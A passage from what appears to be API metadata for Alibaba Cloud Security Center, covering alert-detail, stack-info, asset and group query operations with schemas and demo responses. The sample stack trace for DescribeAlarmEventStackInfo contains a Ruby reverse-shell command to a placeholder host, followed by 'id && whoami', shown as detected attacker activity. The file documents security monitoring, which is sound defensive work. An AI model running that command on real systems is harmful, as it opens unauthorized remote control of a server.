'The name of the alert event.'."\n", 'type' => 'string', 'example' => 'Login with unusual location', 'title' => ''], 'EndTime' => ['description' => 'The timestamp when the alert event ends. Unit: milliseconds.'."\n", 'type' => 'integer', 'format' => 'int64', 'example' => '1542366542000', 'title' => ''], 'Uuid' => ['description' => 'The instance UUID of the asset.'."\n", 'type' => 'string', 'example' => '6690a46c-0edb-4663-a641-3629d1a9****', 'title' => ''], 'StartTime' => ['description' => 'The timestamp when the alert event starts. Unit: milliseconds.'."\n", 'type' => 'integer', 'format' => 'int64', 'example' => '1542378601000', 'title' => ''], 'ContainerId' => ['description' => 'The ID of the container application.'."\n", 'type' => 'string', 'example' => 'container_1606995441910_394868_01_000***', 'title' => ''], 'K8sPodName' => ['description' => 'The name of the Kubernetes pod.'."\n", 'type' => 'string', 'example' => 'myapp-pod', 'title' => ''], 'K8sNamespace' => ['description' => 'The namespace of the Kubernetes cluster.'."\n", 'type' => 'string', 'example' => 'sit-saic-trip', 'title' => ''], 'K8sNodeName' => ['description' => 'The name of the Kubernetes cluster node.'."\n", 'type' => 'string', 'example' => 'cn-hangzhou.10.188.139.**', 'title' => ''], 'Level' => ['description' => 'The severity of the alert event. Valid values:'."\n" ."\n" .'* **serious**'."\n" .'* **suspicious**'."\n" .'* **remind**'."\n", 'type' => 'string', 'example' => 'serious', 'title' => ''], 'CauseDetails' => [ 'description' => 'An array consisting of the cause of the alert event, which can be used to trace the alert event.'."\n", 'type' => 'array', 'items' => [ 'type' => 'object', 'properties' => [ 'Key' => ['description' => 'The key that is used to trace the alert event.'."\n", 'type' => 'string', 'example' => '842e314e69b1a2c45d5c1a2f88a16***', 'title' => ''], 'Value' => [ 'description' => 'The value that is used to trace the alert event.'."\n", 'type' => 'array', 'items' => [ 'description' => 'The tracing information.'."\n", 'type' => 'object', 'properties' => [ 'Type' => ['description' => 'The type of the field that displays the tracing information. Valid values:'."\n" ."\n" .'* **text**'."\n" .'* **html**'."\n", 'type' => 'string', 'example' => 'html', 'title' => ''], 'Value' => ['description' => 'The value of the field that displays the tracing information.'."\n", 'type' => 'string', 'example' => '

under a certain small probability, yundun may mistakenly judge the repeated attempts caused by the administrator forgetting or entering the wrong password as successful blasting. Please check according to the account number and time shown in the alarm details. Once it is confirmed that it is not the initiative of the administrator, it is recommended to immediately block the IP, and you can open it at the same timePAM, hosting host login password, improving remote connection efficiency and security control ability, and according tobest practice of ECS account security protectionModify login password and convergence asset.

↵', 'title' => ''], 'Name' => ['description' => 'The name of the field that displays the tracing information.'."\n", 'type' => 'string', 'example' => 'sshd', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => 'You are not authorized to do this operation.'], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'DescribeAlarmEventDetail', 'requestParamsDescription' => ' ', 'responseParamsDescription' => ' ', 'extraInfo' => ' ', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '100', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeAlarmEventDetail'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeAlarmEventDetail', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"type":"json","example":"{\\n \\"RequestId\\": \\"7EA50837-2F0B-5BCC-AB61-4968D88D75AD\\",\\n \\"Data\\": {\\n \\"Type\\": \\"Webshell\\",\\n \\"InternetIp\\": \\"172.16.XX.XX\\",\\n \\"K8sClusterName\\": \\"TestK8sCluser\\",\\n \\"ContainerImageId\\": \\"cadb7a725641\\",\\n \\"AlarmEventDesc\\": \\"The detection model finds that self-mutation is running on your server. A self-mutation Trojan is a Trojan horse program with self-mutation function. It will change its hash or copy a large number of itself to different paths, and run in the background to avoid cleaning.\\",\\n \\"AlarmUniqueInfo\\": \\"9f62555666f177aa84ee1eaf465a****\\",\\n \\"CanCancelFault\\": false,\\n \\"AppName\\": \\"app:msdp-uat-service\\",\\n \\"CanBeDealOnLine\\": false,\\n \\"ContainerImageName\\": \\"jenkins/jenkins:latest\\",\\n \\"K8sClusterId\\": \\"c562cf0d68e9749ee9fe544a7ab2f****\\",\\n \\"ContainHwMode\\": true,\\n \\"InstanceName\\": \\"i-wz92q7m5hsbgfhdss***\\",\\n \\"K8sNodeId\\": \\"i-bp14a1ay8e0aa9t0l***\\",\\n \\"Solution\\": \\"An invalid logon source IP has been detected. If you recognize this logon attempt, we recommend that you add the current logon source IP to the valid logon source IP list to avoid future alerts. If you do not recognize this logon attempt, we recommend that you modify the password.\\",\\n \\"DataSource\\": \\"aegis_***\\",\\n \\"IntranetIp\\": \\"172.25.30.**\\",\\n \\"AlarmEventAliasName\\": \\"Login with unusual location\\",\\n \\"EndTime\\": 1542366542000,\\n \\"Uuid\\": \\"6690a46c-0edb-4663-a641-3629d1a9****\\",\\n \\"StartTime\\": 1542378601000,\\n \\"ContainerId\\": \\"container_1606995441910_394868_01_000***\\",\\n \\"K8sPodName\\": \\"myapp-pod\\",\\n \\"K8sNamespace\\": \\"sit-saic-trip\\",\\n \\"K8sNodeName\\": \\"cn-hangzhou.10.188.139.**\\",\\n \\"Level\\": \\"serious\\",\\n \\"CauseDetails\\": [\\n {\\n \\"Key\\": \\"842e314e69b1a2c45d5c1a2f88a16***\\",\\n \\"Value\\": [\\n {\\n \\"Type\\": \\"html\\",\\n \\"Value\\": \\"

under a certain small probability, yundun may mistakenly judge the repeated attempts caused by the administrator forgetting or entering the wrong password as successful blasting. Please check according to the account number and time shown in the alarm details. Once it is confirmed that it is not the initiative of the administrator, it is recommended to immediately block the IP, and you can open it at the same timePAM, hosting host login password, improving remote connection efficiency and security control ability, and according tobest practice of ECS account security protectionModify login password and convergence asset.

↵\\",\\n \\"Name\\": \\"sshd\\"\\n }\\n ]\\n }\\n ]\\n }\\n}","errorExample":""},{"type":"xml","example":"","errorExample":""}]', ], 'DescribeAlarmEventStackInfo' => [ 'summary' => 'Queries the stack information about an alert event.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => true, 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsas731ZAS'], ], 'parameters' => [ [ 'name' => 'SourceIp', 'in' => 'query', 'schema' => ['description' => 'The source IP address of the request.'."\n", 'type' => 'string', 'required' => false, 'example' => '192.168.XX.XX', 'title' => ''], ], [ 'name' => 'Lang', 'in' => 'query', 'allowEmptyValue' => true, 'schema' => ['description' => 'The language of the content within the request and response. Default value: **zh**. Valid values:'."\n" ."\n" .'* **zh**: Chinese.'."\n" .'* **en**: English.'."\n", 'type' => 'string', 'required' => false, 'example' => 'zh', 'default' => 'zh', 'title' => ''], ], [ 'name' => 'Uuid', 'in' => 'query', 'schema' => ['description' => 'The UUID of the server to query.'."\n" ."\n" .'> You can call the [DescribeSuspEvents](~~DescribeSuspEvents~~) operation to query the UUIDs of servers.'."\n", 'type' => 'string', 'required' => true, 'example' => '18b7336e-d469-473b-af83-8e5420f9****', 'title' => ''], ], [ 'name' => 'EventName', 'in' => 'query', 'schema' => ['description' => 'The name of the event.'."\n" ."\n" .'> You can call the [DescribeSuspEvents](~~DescribeSuspEvents~~) operation to query the names of events.'."\n", 'type' => 'string', 'required' => true, 'example' => 'Variable Trojan', 'title' => ''], ], [ 'name' => 'UniqueInfo', 'in' => 'query', 'schema' => ['description' => 'The ID of the alert event.'."\n", 'type' => 'string', 'required' => true, 'example' => '1fbe8d16727f61d1478a674d6fa0****', 'title' => ''], ], [ 'name' => 'ResourceDirectoryAccountId', 'in' => 'query', 'schema' => ['description' => 'The Alibaba Cloud account ID of the member in the resource directory.'."\n" ."\n" .'> You can call the [DescribeMonitorAccounts](~~DescribeMonitorAccounts~~) operation to obtain the IDs.'."\n", 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '127608589417****', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'StackInfo' => ['description' => 'The stack information of the alert details.'."\n", 'type' => 'string', 'example' => '['."\n" .' {'."\n" .' "child": ['."\n" .' {'."\n" .' "child": ['."\n" .' {'."\n" .' "child": ['."\n" .' '."\n" .' ],'."\n" .' "data": {'."\n" .' "cmdline": "id",'."\n" .' "proc_path": "/bin/id",'."\n" .' "pid": "[3033]"'."\n" .' },'."\n" .' "description": {'."\n" .' "extend": ['."\n" .' '."\n" .' ],'."\n" .' "main": {'."\n" .' "content": "${pid} ${cmdline}",'."\n" .' "content_type": "markdown"'."\n" .' }'."\n" .' }'."\n" .' },'."\n" .' {'."\n" .' "child": ['."\n" .' '."\n" .' ],'."\n" .' "data": {'."\n" .' "cmdline": "whoami",'."\n" .' "proc_path": "/bin/whoami",'."\n" .' "pid": "[3035]"'."\n" .' },'."\n" .' "description": {'."\n" .' "extend": ['."\n" .' '."\n" .' ],'."\n" .' "main": {'."\n" .' "content": "${pid} ${cmdline}",'."\n" .' "content_type": "markdown"'."\n" .' }'."\n" .' }'."\n" .' }'."\n" .' ],'."\n" .' "data": {'."\n" .' "cmdline": "/bin/bash -c \'id && whoami\'",'."\n" .' "proc_path": "/bin/bash",'."\n" .' "pid": "[3022]"'."\n" .' },'."\n" .' "description": {'."\n" .' "extend": ['."\n" .' '."\n" .' ],'."\n" .' "main": {'."\n" .' "content": "${pid} ${cmdline}",'."\n" .' "content_type": "markdown"'."\n" .' }'."\n" .' }'."\n" .' }'."\n" .' ],'."\n" .' "data": {'."\n" .' "src_ip": "0.0.0.0",'."\n" .' "cmdline": "ruby -rsocket -e exit if fork;c=TCPSocket.new(\\"0.0.0.0\\",\\"1111\\");while(cmd=c.gets);IO.popen(cmd,\\"r\\"){|io|c.print io.read}end",'."\n" .' "file": "ruby",'."\n" .' "login_port": "22",'."\n" .' "login_type": "password",'."\n" .' "proc_path": "/usr/bin/ruby",'."\n" .' "dst_port": "1111",'."\n" .' "pid": "3011",'."\n" .' "user": "root",'."\n" .' "dst_ip": "0.0.0.0",'."\n" .' "log_time": "2020-01-20 09:00:00"'."\n" .' },'."\n" .' "description": {'."\n" .' "extend": ['."\n" .' {'."\n" .' "content": "${tpl_netstat}",'."\n" .' "content_type": "text"'."\n" .' }'."\n" .' ],'."\n" .' "main": {'."\n" .' "content": "${pid} ${cmdline}",'."\n" .' "content_type": "markdown"'."\n" .' }'."\n" .' }'."\n" .' }'."\n" .']', 'title' => ''], 'RequestId' => ['description' => 'The ID of the request.'."\n", 'type' => 'string', 'example' => 'ECC6B3E3-D496-512D-B46D-E6996A6B63EE', 'title' => ''], ], 'description' => 'The returned data.', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'no permission', 'description' => ''], ['errorCode' => 'RdCheckNoPermission', 'errorMessage' => 'Resource directory account verification has no permission.', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => 'You are not authorized to do this operation.'], ], 500 => [ ['errorCode' => 'RdCheckInnerError', 'errorMessage' => 'Resource directory account service internal error.', 'description' => ''], ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'staticInfo' => ['noSubstitutionReason' => '暂无替代API,请关注后续API最新发布。'], 'title' => 'DescribeAlarmEventStackInfo', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '100', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeAlarmEventStackInfo'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeAlarmEventStackInfo', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"StackInfo\\": \\"[\\\\n {\\\\n \\\\\\"child\\\\\\": [\\\\n {\\\\n \\\\\\"child\\\\\\": [\\\\n {\\\\n \\\\\\"child\\\\\\": [\\\\n \\\\n ],\\\\n \\\\\\"data\\\\\\": {\\\\n \\\\\\"cmdline\\\\\\": \\\\\\"id\\\\\\",\\\\n \\\\\\"proc_path\\\\\\": \\\\\\"/bin/id\\\\\\",\\\\n \\\\\\"pid\\\\\\": \\\\\\"[3033]\\\\\\"\\\\n },\\\\n \\\\\\"description\\\\\\": {\\\\n \\\\\\"extend\\\\\\": [\\\\n \\\\n ],\\\\n \\\\\\"main\\\\\\": {\\\\n \\\\\\"content\\\\\\": \\\\\\"${pid} ${cmdline}\\\\\\",\\\\n \\\\\\"content_type\\\\\\": \\\\\\"markdown\\\\\\"\\\\n }\\\\n }\\\\n },\\\\n {\\\\n \\\\\\"child\\\\\\": [\\\\n \\\\n ],\\\\n \\\\\\"data\\\\\\": {\\\\n \\\\\\"cmdline\\\\\\": \\\\\\"whoami\\\\\\",\\\\n \\\\\\"proc_path\\\\\\": \\\\\\"/bin/whoami\\\\\\",\\\\n \\\\\\"pid\\\\\\": \\\\\\"[3035]\\\\\\"\\\\n },\\\\n \\\\\\"description\\\\\\": {\\\\n \\\\\\"extend\\\\\\": [\\\\n \\\\n ],\\\\n \\\\\\"main\\\\\\": {\\\\n \\\\\\"content\\\\\\": \\\\\\"${pid} ${cmdline}\\\\\\",\\\\n \\\\\\"content_type\\\\\\": \\\\\\"markdown\\\\\\"\\\\n }\\\\n }\\\\n }\\\\n ],\\\\n \\\\\\"data\\\\\\": {\\\\n \\\\\\"cmdline\\\\\\": \\\\\\"/bin/bash -c \'id && whoami\'\\\\\\",\\\\n \\\\\\"proc_path\\\\\\": \\\\\\"/bin/bash\\\\\\",\\\\n \\\\\\"pid\\\\\\": \\\\\\"[3022]\\\\\\"\\\\n },\\\\n \\\\\\"description\\\\\\": {\\\\n \\\\\\"extend\\\\\\": [\\\\n \\\\n ],\\\\n \\\\\\"main\\\\\\": {\\\\n \\\\\\"content\\\\\\": \\\\\\"${pid} ${cmdline}\\\\\\",\\\\n \\\\\\"content_type\\\\\\": \\\\\\"markdown\\\\\\"\\\\n }\\\\n }\\\\n }\\\\n ],\\\\n \\\\\\"data\\\\\\": {\\\\n \\\\\\"src_ip\\\\\\": \\\\\\"0.0.0.0\\\\\\",\\\\n \\\\\\"cmdline\\\\\\": \\\\\\"ruby -rsocket -e exit if fork;c=TCPSocket.new(\\\\\\\\\\\\\\"0.0.0.0\\\\\\\\\\\\\\",\\\\\\\\\\\\\\"1111\\\\\\\\\\\\\\");while(cmd=c.gets);IO.popen(cmd,\\\\\\\\\\\\\\"r\\\\\\\\\\\\\\"){|io|c.print io.read}end\\\\\\",\\\\n \\\\\\"file\\\\\\": \\\\\\"ruby\\\\\\",\\\\n \\\\\\"login_port\\\\\\": \\\\\\"22\\\\\\",\\\\n \\\\\\"login_type\\\\\\": \\\\\\"password\\\\\\",\\\\n \\\\\\"proc_path\\\\\\": \\\\\\"/usr/bin/ruby\\\\\\",\\\\n \\\\\\"dst_port\\\\\\": \\\\\\"1111\\\\\\",\\\\n \\\\\\"pid\\\\\\": \\\\\\"3011\\\\\\",\\\\n \\\\\\"user\\\\\\": \\\\\\"root\\\\\\",\\\\n \\\\\\"dst_ip\\\\\\": \\\\\\"0.0.0.0\\\\\\",\\\\n \\\\\\"log_time\\\\\\": \\\\\\"2020-01-20 09:00:00\\\\\\"\\\\n },\\\\n \\\\\\"description\\\\\\": {\\\\n \\\\\\"extend\\\\\\": [\\\\n {\\\\n \\\\\\"content\\\\\\": \\\\\\"${tpl_netstat}\\\\\\",\\\\n \\\\\\"content_type\\\\\\": \\\\\\"text\\\\\\"\\\\n }\\\\n ],\\\\n \\\\\\"main\\\\\\": {\\\\n \\\\\\"content\\\\\\": \\\\\\"${pid} ${cmdline}\\\\\\",\\\\n \\\\\\"content_type\\\\\\": \\\\\\"markdown\\\\\\"\\\\n }\\\\n }\\\\n }\\\\n]\\",\\n \\"RequestId\\": \\"ECC6B3E3-D496-512D-B46D-E6996A6B63EE\\"\\n}","type":"json"}]', ], 'DescribeAllEntity' => [ 'summary' => 'Retrieves the list of all server assets, including asset group IDs and asset names.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => ['operationType' => 'get'], 'parameters' => [], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request. Alibaba Cloud generates a unique identifier for each request. You can use the ID to troubleshoot issues.', 'type' => 'string', 'example' => '7E0618A9-D5EF-4220-9471-C42B5E92719F', 'title' => ''], 'EntityList' => [ 'description' => 'The list of instances.', 'type' => 'array', 'items' => [ 'type' => 'object', 'properties' => [ 'Uuid' => ['description' => 'The UUID of the server.', 'type' => 'string', 'example' => '4fe8e1cd-3c37-4851-b9de-124da32c****', 'title' => ''], 'GroupId' => ['description' => 'The ID of the asset group.', 'type' => 'integer', 'format' => 'int32', 'example' => '281801', 'title' => ''], 'InternetIp' => ['description' => 'The public IP address.', 'type' => 'string', 'example' => '172.19.XX.XX', 'title' => ''], 'InstanceName' => ['description' => 'The name of the server instance.', 'type' => 'string', 'example' => 'abc', 'title' => ''], 'Ip' => ['description' => 'The IP address of the server.', 'type' => 'string', 'example' => '101.132.XX.XX', 'title' => ''], 'Os' => ['description' => 'The operating system of the server. Valid values:'."\n" .'- **linux**'."\n" .'- **windows**.', 'type' => 'string', 'example' => 'windows', 'title' => ''], 'IntranetIp' => ['description' => 'The private IP address.', 'type' => 'string', 'example' => '100.104.XX.XX', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'no permission', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query all server asset list information', 'responseParamsDescription' => ' ', 'extraInfo' => ' ', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeAllEntity'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeAllEntity', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"7E0618A9-D5EF-4220-9471-C42B5E92719F\\",\\n \\"EntityList\\": [\\n {\\n \\"Uuid\\": \\"4fe8e1cd-3c37-4851-b9de-124da32c****\\",\\n \\"GroupId\\": 281801,\\n \\"InternetIp\\": \\"172.19.XX.XX\\",\\n \\"InstanceName\\": \\"abc\\",\\n \\"Ip\\": \\"101.132.XX.XX\\",\\n \\"Os\\": \\"windows\\",\\n \\"IntranetIp\\": \\"100.104.XX.XX\\"\\n }\\n ]\\n}","type":"json"}]', ], 'DescribeAllGroups' => [ 'summary' => 'Queries information about all server groups.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsas36IOGX'], ], 'parameters' => [ [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language of the request and response. Default value: **zh**. Valid values:'."\n" .'- **zh**: Chinese'."\n" .'- **en**: English.', 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'Count' => ['description' => 'The total number of server groups.', 'type' => 'integer', 'format' => 'int32', 'example' => '2', 'title' => ''], 'RequestId' => ['description' => 'The unique identifier that Alibaba Cloud generated for the request.', 'type' => 'string', 'example' => '7E0618A9-D5EF-4220-9471-C42B5E92719F', 'title' => ''], 'Groups' => [ 'description' => 'The server group information.', 'type' => 'array', 'items' => [ 'type' => 'object', 'properties' => [ 'GroupName' => ['description' => 'The name of the server group.', 'type' => 'string', 'example' => 'abc', 'title' => ''], 'GroupId' => ['description' => 'The ID of the server group.', 'type' => 'integer', 'format' => 'int32', 'example' => '8834224', 'title' => ''], 'GroupFlag' => ['description' => 'The type of the server group. Valid values:'."\n" .'- **0**: default group'."\n" .'- **1**: other group.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'no permission', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query server group information', 'responseParamsDescription' => ' ', 'extraInfo' => ' ', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeAllGroups'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeAllGroups', 'authLevel' => 'resource', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'Group', 'arn' => 'acs:yundun-sas:{#regionId}:{#accountId}:group/*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"Count\\": 2,\\n \\"RequestId\\": \\"7E0618A9-D5EF-4220-9471-C42B5E92719F\\",\\n \\"Groups\\": [\\n {\\n \\"GroupName\\": \\"abc\\",\\n \\"GroupId\\": 8834224,\\n \\"GroupFlag\\": 1\\n }\\n ]\\n}","type":"json"}]', ], 'DescribeAllImageBaseline' => [ 'summary' => 'Retrieves the list of all image baseline check items.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => ['operationType' => 'get'], 'parameters' => [ [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language type for the request and response messages. Default value: **zh**. Valid values:'."\n" .'- **zh**: Chinese.'."\n" .'- **en**: English.', 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request. The ID is used to locate logs and troubleshoot issues.', 'type' => 'string', 'example' => '1A975D03-5F49-5354-B2CB-3918D5DA****', 'title' => ''], 'ImageBaselines' => [ 'description' => 'The details of the image baseline check list.', 'type' => 'object', 'properties' => [ 'BaselineClassList' => [ 'description' => 'The list of baseline categories.', 'type' => 'array', 'items' => [ 'description' => 'The list of baseline categories.', 'type' => 'object', 'properties' => [ 'ClassKey' => ['description' => 'The type key of the baseline category.', 'type' => 'string', 'example' => 'identification', 'title' => ''], 'Alias' => ['description' => 'The alias of the baseline category.', 'type' => 'string', 'example' => '身份鉴别', 'title' => ''], 'BaselineNameList' => [ 'description' => 'The list of baseline main items.', 'type' => 'array', 'items' => [ 'description' => 'The list of baseline main items.', 'type' => 'object', 'properties' => [ 'NameKey' => ['description' => 'The name key of the baseline main item.', 'type' => 'string', 'example' => 'identification', 'title' => ''], 'ClassKey' => ['description' => 'The type key of the baseline main item.', 'type' => 'string', 'example' => 'identification', 'title' => ''], 'Alias' => ['description' => 'The alias of the baseline main item.', 'type' => 'string', 'example' => '身份鉴别', 'title' => ''], 'BaselineItemList' => [ 'description' => 'The list of baseline sub-items.', 'type' => 'array', 'items' => [ 'description' => 'The list of baseline sub-items.', 'type' => 'object', 'properties' => [ 'NameKey' => ['description' => 'The name key of the baseline main item.', 'type' => 'string', 'example' => 'identification', 'title' => ''], 'ItemKey' => ['description' => 'The name key of the baseline sub-item.', 'type' => 'string', 'example' => 'duplicate_pwd_hash', 'title' => ''], 'ClassKey' => ['description' => 'The type key of the baseline main item.', 'type' => 'string', 'example' => 'identification', 'title' => ''], 'Alias' => ['description' => 'The alias of the baseline sub-item.', 'type' => 'string', 'example' => '确保不存在相同密码Hash的账户', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Retrieve all image baseline check items', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeAllImageBaseline'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeAllImageBaseline', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"1A975D03-5F49-5354-B2CB-3918D5DA****\\",\\n \\"ImageBaselines\\": {\\n \\"BaselineClassList\\": [\\n {\\n \\"ClassKey\\": \\"identification\\",\\n \\"Alias\\": \\"身份鉴别\\",\\n \\"BaselineNameList\\": [\\n {\\n \\"NameKey\\": \\"identification\\",\\n \\"ClassKey\\": \\"identification\\",\\n \\"Alias\\": \\"身份鉴别\\",\\n \\"BaselineItemList\\": [\\n {\\n \\"NameKey\\": \\"identification\\",\\n \\"ItemKey\\": \\"duplicate_pwd_hash\\",\\n \\"ClassKey\\": \\"identification\\",\\n \\"Alias\\": \\"确保不存在相同密码Hash的账户\\"\\n }\\n ]\\n }\\n ]\\n }\\n ]\\n }\\n}","type":"json"}]', ], 'DescribeAllRegionsStatistics' => [ 'summary' => 'Queries the statistics on global security events, including the numbers of unfixed vulnerabilities, baseline risks, and alerts.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'get', 'abilityTreeCode' => '91988', 'abilityTreeNodes' => ['FEATUREsasJODUMM'], ], 'parameters' => [ [ 'name' => 'SourceIp', 'in' => 'query', 'schema' => ['description' => 'The source IP address of the request.'."\n", 'type' => 'string', 'required' => false, 'example' => '33.80.XXX.XXX', 'title' => ''], ], [ 'name' => 'From', 'in' => 'query', 'schema' => ['description' => 'The source of the request. Default value: **aqs**. Valid values:'."\n" ."\n" .'* **sas**: Security Center.'."\n" .'* **aqs**: Server Guard.'."\n", 'type' => 'string', 'required' => false, 'example' => 'sas', 'title' => ''], ], [ 'name' => 'GroupId', 'in' => 'query', 'schema' => ['description' => 'The ID of the asset group that you want to query.'."\n" ."\n" .'> You can call the [DescribeAllGroups](~~130972~~) operation to query the ID.'."\n", 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '1161****', 'title' => ''], ], [ 'name' => 'Remark', 'in' => 'query', 'schema' => ['description' => 'The name or public IP address of the asset.'."\n", 'type' => 'string', 'required' => false, 'example' => '192.168.XX.XX', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'description' => 'The response parameters.'."\n", 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID.'."\n", 'type' => 'string', 'example' => 'B9A68671-BD84-55CD-807A-BA3A5490FCB4', 'title' => ''], 'Data' => [ 'description' => 'The data returned.'."\n", 'type' => 'object', 'properties' => [ 'Account' => ['description' => 'The number of logons to the asset.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], 'Vul' => ['description' => 'The number of unfixed vulnerabilities.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '17', 'title' => ''], 'Health' => ['description' => 'The total number of unfixed baseline risks.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '2', 'title' => ''], 'Trojan' => ['description' => 'The number of webshell alerts.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'NewSuspicious' => ['description' => 'The number of alerts that are generated by Server Guard or Security Center.'."\n" ."\n" .'> '."\n" ."\n" .'* If **From** is set to **sas**, this parameter indicates the 